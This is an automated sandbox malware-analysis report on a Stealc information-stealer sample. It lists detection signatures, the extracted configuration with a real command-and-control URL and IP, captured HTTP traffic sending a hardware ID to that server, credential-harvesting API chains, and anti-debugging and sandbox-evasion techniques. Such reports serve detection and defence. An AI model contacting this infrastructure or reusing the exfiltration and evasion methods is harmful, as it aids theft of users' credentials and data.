Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1540473
MD5:1d63962fa977f6d304646bb056c59d16
SHA1:7a7b2a8425fa3e601de7f51c6e3377b7f641d3e9
SHA256:b6f0f7c28a9b15f590c9a327464d2d562603fcbf246f03399cdc1234007d85e7
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6488 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1D63962FA977F6D304646BB056C59D16)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000004.00000003.1298921959.0000000004A20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6488JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6488JoeSecurity_StealcYara detected StealcJoe Security
              SourceRuleDescriptionAuthorStrings
              4.2.file.exe.80000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-23T20:04:11.651073+020020442431Malware Command and Control Activity Detected192.168.2.749700185.215.113.3780TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: file.exeAvira: detected
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Source: 4.2.file.exe.80000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0008C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,4_2_0008C820
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00087240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,4_2_00087240
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00089AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,4_2_00089AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00089B60 CryptUnprotectData,LocalAlloc,LocalFree,4_2_00089B60
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00098EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,4_2_00098EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_000938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,4_2_000938B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00094910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00094910
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0008DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_0008DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0008E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_0008E430
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0008ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_0008ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00094570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,4_2_00094570
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0008DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0008DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0008BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,4_2_0008BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00093EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,4_2_00093EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0008F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0008F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_000816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_000816D0

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49700 -> 185.215.113.37:80
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 30 44 44 30 33 36 34 35 42 46 42 34 31 30 39 33 35 33 31 37 31 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 2d 2d 0d 0a Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="hwid"30DD03645BFB4109353171------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="build"doma------GDHIDHIEGIIIECAKEBFB--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00084880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,4_2_00084880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 30 44 44 30 33 36 34 35 42 46 42 34 31 30 39 33 35 33 31 37 31 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 2d 2d 0d 0a Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="hwid"30DD03645BFB4109353171------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="build"doma------GDHIDHIEGIIIECAKEBFB--
                Source: file.exe, 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php)G
                Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php1G
                Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php4
                Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpUG
                Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpyGD
                Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/h
                Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37t

                System Summary

                barindex
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0044C8D24_2_0044C8D2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004129EE4_2_004129EE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00391A574_2_00391A57
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004532E14_2_004532E1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_003B7B5F4_2_003B7B5F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00368B944_2_00368B94
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0044E3904_2_0044E390
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00321BCC4_2_00321BCC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004FCC554_2_004FCC55
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00454DDA4_2_00454DDA
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0040FDF14_2_0040FDF1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0044B5FC4_2_0044B5FC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00437EC14_2_00437EC1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0039A6BA4_2_0039A6BA
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0035DEA74_2_0035DEA7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00449EDB4_2_00449EDB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00305F2D4_2_00305F2D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00447F6C4_2_00447F6C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004517DF4_2_004517DF
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 000845C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: zdqimryq ZLIB complexity 0.9947830924578867
                Source: file.exe, 00000004.00000003.1298921959.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00099600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_00099600
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00093720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,4_2_00093720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\VYV19CV8.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: file.exeString found in binary or memory: /addW|R#
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1827840 > 1048576
                Source: file.exeStatic PE information: Raw size of zdqimryq is bigger than: 0x100000 < 0x198200

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 4.2.file.exe.80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;zdqimryq:EW;aqqapoae:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;zdqimryq:EW;aqqapoae:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00099860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00099860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c43c2 should be: 0x1c92c1
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: zdqimryq
                Source: file.exeStatic PE information: section name: aqqapoae
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_003C583C push ebx; mov dword ptr [esp], eax4_2_003C589E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00508040 push ebp; mov dword ptr [esp], eax4_2_00508045
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00508040 push edi; mov dword ptr [esp], edx4_2_0050807C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004D586B push ebx; mov dword ptr [esp], esi4_2_004D589E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0009B035 push ecx; ret 4_2_0009B048
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004E381F push 2A179F55h; mov dword ptr [esp], eax4_2_004E386D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004E381F push 72FEBC6Dh; mov dword ptr [esp], eax4_2_004E38B3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004E301C push 2ACBD5B8h; mov dword ptr [esp], eax4_2_004E3045
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004E301C push 714E1BB3h; mov dword ptr [esp], edx4_2_004E305F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004FE01A push ebx; mov dword ptr [esp], edx4_2_004FE01E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00539023 push 1C3AE1EFh; mov dword ptr [esp], edi4_2_0053906E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004D3035 push 116C456Dh; mov dword ptr [esp], eax4_2_004D3054
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004D3035 push eax; mov dword ptr [esp], esi4_2_004D3091
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004CF037 push ebx; mov dword ptr [esp], edx4_2_004CF041
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004CF037 push 2E6173DFh; mov dword ptr [esp], ecx4_2_004CF074
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004CF037 push eax; mov dword ptr [esp], ecx4_2_004CF098
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_005200D1 push 50A3D610h; mov dword ptr [esp], ebp4_2_0052013D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004FB8C3 push edi; mov dword ptr [esp], esp4_2_004FB8E1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_005310DE push ebx; mov dword ptr [esp], edx4_2_00531106
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_005310DE push ecx; mov dword ptr [esp], edx4_2_005311B5
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0044C8D2 push edi; mov dword ptr [esp], ebx4_2_0044C8EB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0044C8D2 push 5AB05420h; mov dword ptr [esp], edi4_2_0044CA0D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0044C8D2 push 0EEFC66Eh; mov dword ptr [esp], eax4_2_0044CA2F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0044C8D2 push edi; mov dword ptr [esp], edx4_2_0044CA9B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0044C8D2 push 39380A10h; mov dword ptr [esp], ebx4_2_0044CAC4
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0044C8D2 push ebp; mov dword ptr [esp], 039E887Bh4_2_0044CAD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0044C8D2 push ecx; mov dword ptr [esp], esi4_2_0044CAF3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0044C8D2 push ecx; mov dword ptr [esp], edx4_2_0044CB12
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0044C8D2 push 48D25A82h; mov dword ptr [esp], esi4_2_0044CB66
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0044C8D2 push ebp; mov dword ptr [esp], 5BDA3B90h4_2_0044CB6D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0044C8D2 push 328B56C1h; mov dword ptr [esp], esi4_2_0044CBCB
                Source: file.exeStatic PE information: section name: zdqimryq entropy: 7.953415844862702

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00099860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00099860

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_4-13249
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E204A second address: 2E204E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45A68E second address: 45A694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4598F2 second address: 45990F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA49D1B33C8h 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jno 00007FA49D1B33C6h 0x00000011 pop edx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45990F second address: 459917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 459917 second address: 45991C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 459E78 second address: 459E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 459E7C second address: 459E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA49D1B33CDh 0x0000000d je 00007FA49D1B33C6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 459E97 second address: 459E9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C208 second address: 45C20C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C271 second address: 45C276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
